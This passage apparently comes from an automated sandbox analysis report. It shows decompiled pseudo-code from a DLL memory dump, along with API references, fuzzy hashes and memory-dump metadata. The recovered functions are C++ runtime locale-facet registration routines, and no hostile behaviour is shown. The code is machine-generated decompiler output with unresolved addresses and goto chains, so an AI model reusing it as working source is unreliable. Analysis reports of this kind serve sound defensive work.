																																																	goto L103;
																																																}
																																															} else {
																																																_t895 = _t917;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t894 =  *(_t946 - 0x10);
																																														 *(_t946 - 0x10) = _t894;
																																														 *(_t946 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t894);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t894 + 4))))();
																																														 *0x6e286dd8 = _t894;
																																														goto L96;
																																													}
																																												} else {
																																													_t894 = _t916;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t893 =  *(_t946 - 0x10);
																																											 *(_t946 - 0x10) = _t893;
																																											 *(_t946 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t893);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t893 + 4))))();
																																											 *0x6e286dc4 = _t893;
																																											goto L89;
																																										}
																																									} else {
																																										_t893 = _t915;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t892 =  *(_t946 - 0x10);
																																								 *(_t946 - 0x10) = _t892;
																																								 *(_t946 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t892);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t892 + 4))))();
																																								 *0x6e286dc8 = _t892;
																																								goto L82;
																																							}
																																						} else {
																																							_t892 = _t914;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t891 =  *(_t946 - 0x10);
																																					 *(_t946 - 0x10) = _t891;
																																					 *(_t946 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t891);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t891 + 4))))();
																																					 *0x6e286df4 = _t891;
																																					goto L75;
																																				}
																																			} else {
																																				_t891 = _t913;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t890 =  *(_t946 - 0x10);
																																		 *(_t946 - 0x10) = _t890;
																																		 *(_t946 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t890);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t890 + 4))))();
																																		 *0x6e286df8 = _t890;
																																		goto L68;
																																	}
																																} else {
																																	_t890 = _t912;
																																	goto L68;
																																}
																															}
																														} else {
																															_t889 =  *(_t946 - 0x10);
																															 *(_t946 - 0x10) = _t889;
																															 *(_t946 - 4) = 1;
																															E6E1C6FD3(__eflags, _t889);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t889 + 4))))();
																															 *0x6e286dc0 = _t889;
																															goto L61;
																														}
																													} else {
																														_t889 = _t911;
																														goto L61;
																													}
																												}
																											} else {
																												_t888 =  *(_t946 - 0x10);
																												 *(_t946 - 0x10) = _t888;
																												 *(_t946 - 4) = 1;
																												E6E1C6FD3(__eflags, _t888);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t888 + 4))))();
																												 *0x6e286df0 = _t888;
																												goto L54;
																											}
																										} else {
																											_t888 = _t910;
																											goto L54;
																										}
																									}
																								} else {
																									_t887 =  *(_t946 - 0x10);
																									 *(_t946 - 0x10) = _t887;
																									 *(_t946 - 4) = 1;
																									E6E1C6FD3(__eflags, _t887);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t887 + 4))))();
																									 *0x6e286dbc = _t887;
																									goto L47;
																								}
																							} else {
																								_t887 = _t909;
																								goto L47;
																							}
																						}
																					} else {
																						_t886 =  *(_t946 - 0x10);
																						 *(_t946 - 0x10) = _t886;
																						 *(_t946 - 4) = 1;
																						E6E1C6FD3(__eflags, _t886);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t886 + 4))))();
																						 *0x6e286dec = _t886;
																						goto L40;
																					}
																				} else {
																					_t886 = _t908;
																					goto L40;
																				}
																			}
																		} else {
																			_t885 =  *(_t946 - 0x10);
																			 *(_t946 - 0x10) = _t885;
																			 *(_t946 - 4) = 1;
																			E6E1C6FD3(__eflags, _t885);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t885 + 4))))();
																			 *0x6e286db8 = _t885;
																			goto L33;
																		}
																	} else {
																		_t885 = _t907;
																		goto L33;
																	}
																}
															} else {
																_t884 =  *(_t946 - 0x10);
																 *(_t946 - 0x10) = _t884;
																 *(_t946 - 4) = 1;
																E6E1C6FD3(__eflags, _t884);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t884 + 4))))();
																 *0x6e286de8 = _t884;
																goto L26;
															}
														} else {
															_t884 = _t906;
															goto L26;
														}
													}
												} else {
													_t883 =  *(_t946 - 0x10);
													 *(_t946 - 0x10) = _t883;
													 *(_t946 - 4) = 1;
													E6E1C6FD3(__eflags, _t883);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t883 + 4))))();
													 *0x6e286dd4 = _t883;
													goto L19;
												}
											} else {
												_t883 = _t905;
												goto L19;
											}
										}
									} else {
										_t882 =  *(_t946 - 0x10);
										 *(_t946 - 0x10) = _t882;
										 *(_t946 - 4) = 1;
										E6E1C6FD3(__eflags, _t882);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t882 + 4))))();
										 *0x6e286db4 = _t882;
										goto L12;
									}
								} else {
									_t882 = _t904;
									goto L12;
								}
							}
						} else {
							_t881 =  *(_t946 - 0x10);
							 *(_t946 - 0x10) = _t881;
							 *(_t946 - 4) = 1;
							E6E1C6FD3(__eflags, _t881);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t881 + 4))))();
							 *0x6e286de4 = _t881;
							goto L5;
						}
					} else {
						_t881 = _t903;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CEF98
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CEFA2
int.LIBCPMT ref: 6E1CEFB9

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

collate.LIBCPMT ref: 6E1CEFDC
std::_Facet_Register.LIBCPMT ref: 6E1CEFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF013
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF031

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 87dcc73f973dc7915ef7be40b7bee51e5a878d6f64789ccba3e4ec89b70f5a4c
Instruction ID: 1d8e61b1ae91dd48a8c23247fc23a2542eb778439727e38e09123df8f464b2b4
Opcode Fuzzy Hash: 87dcc73f973dc7915ef7be40b7bee51e5a878d6f64789ccba3e4ec89b70f5a4c
Instruction Fuzzy Hash: 3A112C7591051DCBCF01DBD4C854BFEB77AAF64B14F244809E520E7290DF789A84E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DBA8A, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E1DBA8A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t154 - 0x14, 0);
				_t147 =  *0x6e286e38;
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6E1A161C(0x6e286e18);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6E1C66BA(_t154 - 0x14);
					return E6E1E0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6E1DC1A4(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t154 - 0x20);
							E6E1E3D74(_t154 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t143, _t147, 0x14);
							E6E1C6653(_t154 - 0x14, 0);
							_t148 =  *0x6e286e40;
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6E1A161C(0x6e286e20);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6E1C66BA(_t154 - 0x14);
								return E6E1E0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6E1DC229(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t154 - 0x20);
										E6E1E3D74(_t154 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t110, _t144, _t148, 0x14);
										E6E1C6653(_t154 - 0x14, 0);
										_t149 =  *0x6e286e44;
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6E1A161C(0x6e286e24);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6E1C66BA(_t154 - 0x14);
											return E6E1E0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6E1DC295(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6E1A1438(_t131);
													E6E1E3D74(_t154 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e22851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6e22c414;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6E1DD028(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6E1E0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6E1C6FD3(__eflags, _t145);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6e286e44 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6E1C6FD3(__eflags, _t144);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6e286e40 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6E1C6FD3(__eflags, _t143);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6e286e38 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DBA91
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DBA9B
int.LIBCPMT ref: 6E1DBAB2

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1DBAD5
std::_Facet_Register.LIBCPMT ref: 6E1DBAEC
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DBB0C
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DBB2A

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 76ccc14f410d11145ed6cb7497f769ee403fb059bac7722c716014847662ea88
Instruction ID: 871425d830d8ca758c1b149f09e5771e32464a45e1ac3515f6095b4040267452
Opcode Fuzzy Hash: 76ccc14f410d11145ed6cb7497f769ee403fb059bac7722c716014847662ea88
Instruction Fuzzy Hash: C31159B6910529CBCF01DBE8C844EFEB37ABF55714F180908E010AB290DF749989E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF9F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF9F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t242 - 0x14, 0);
				_t231 =  *0x6e286de0;
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6E1A161C(0x6e286d8c);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6E1C66BA(_t242 - 0x14);
					return E6E1E0075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6E1D1471(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t242 - 0x20);
							E6E1E3D74(_t242 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t225, _t231, 0x14);
							E6E1C6653(_t242 - 0x14, 0);
							_t232 =  *0x6e286dfc;
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6E1A161C(0x6e286da8);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6E1C66BA(_t242 - 0x14);
								return E6E1E0075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6E1D14EC(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t242 - 0x20);
										E6E1E3D74(_t242 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t172, _t226, _t232, 0x14);
										E6E1C6653(_t242 - 0x14, 0);
										_t233 =  *0x6e286dcc;
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6E1A161C(0x6e286d80);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6E1C66BA(_t242 - 0x14);
											return E6E1E0075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6E1D1558(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t242 - 0x20);
													E6E1E3D74(_t242 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t172, _t227, _t233, 0x14);
													E6E1C6653(_t242 - 0x14, 0);
													_t234 =  *0x6e286e00;
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6E1A161C(0x6e286dac);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6E1C66BA(_t242 - 0x14);
														return E6E1E0075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6E1D15C4(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t242 - 0x20);
																E6E1E3D74(_t242 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t172, _t228, _t234, 0x14);
																E6E1C6653(_t242 - 0x14, 0);
																_t235 =  *0x6e286dd0;
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6E1A161C(0x6e286d60);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6E1C66BA(_t242 - 0x14);
																	return E6E1E0075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6E1D162A(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6E1A1438(_t207);
																			E6E1E3D74(_t242 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e22851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6e22c0c4;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6E1D542F(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6E1E0075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6E1C6FD3(__eflags, _t229);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6e286dd0 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6E1C6FD3(__eflags, _t228);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6e286e00 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6E1C6FD3(__eflags, _t227);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6e286dcc = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6E1C6FD3(__eflags, _t226);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6e286dfc = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6E1C6FD3(__eflags, _t225);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6e286de0 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF9F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFA02
int.LIBCPMT ref: 6E1CFA19

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

numpunct.LIBCPMT ref: 6E1CFA3C
std::_Facet_Register.LIBCPMT ref: 6E1CFA53
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFA73
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFA91

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 06b429a6cd6bf5107d11063a9eefaaea4278f67bf05919a51d323bcbe0e3a97f
Instruction ID: 8edfe73c22ec15f3f6cf4f2005e38ae4c26afc13b590589c1f0be27bf3072d77
Opcode Fuzzy Hash: 06b429a6cd6bf5107d11063a9eefaaea4278f67bf05919a51d323bcbe0e3a97f
Instruction Fuzzy Hash: D31136759105298BCF01DBE4C854AFEB37AAF68B04F244809E121E7290DF78D989E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB9E4, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1DB9E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t198 - 0x14, 0);
				_t189 =  *0x6e286e3c;
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6E1A161C(0x6e286e1c);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6E1C66BA(_t198 - 0x14);
					return E6E1E0075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6E1DC120(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t198 - 0x20);
							E6E1E3D74(_t198 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t184, _t189, 0x14);
							E6E1C6653(_t198 - 0x14, 0);
							_t190 =  *0x6e286e38;
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6E1A161C(0x6e286e18);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6E1C66BA(_t198 - 0x14);
								return E6E1E0075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6E1DC1A4(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t198 - 0x20);
										E6E1E3D74(_t198 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t141, _t185, _t190, 0x14);
										E6E1C6653(_t198 - 0x14, 0);
										_t191 =  *0x6e286e40;
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6E1A161C(0x6e286e20);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6E1C66BA(_t198 - 0x14);
											return E6E1E0075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6E1DC229(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t198 - 0x20);
													E6E1E3D74(_t198 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t141, _t186, _t191, 0x14);
													E6E1C6653(_t198 - 0x14, 0);
													_t192 =  *0x6e286e44;
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6E1A161C(0x6e286e24);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6E1C66BA(_t198 - 0x14);
														return E6E1E0075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6E1DC295(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6E1A1438(_t169);
																E6E1E3D74(_t198 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e22851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6e22c414;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6E1DD028(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6E1E0075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6E1C6FD3(__eflags, _t187);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6e286e44 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6E1C6FD3(__eflags, _t186);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6e286e40 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6E1C6FD3(__eflags, _t185);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6e286e38 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6E1C6FD3(__eflags, _t184);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6e286e3c = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DB9EB
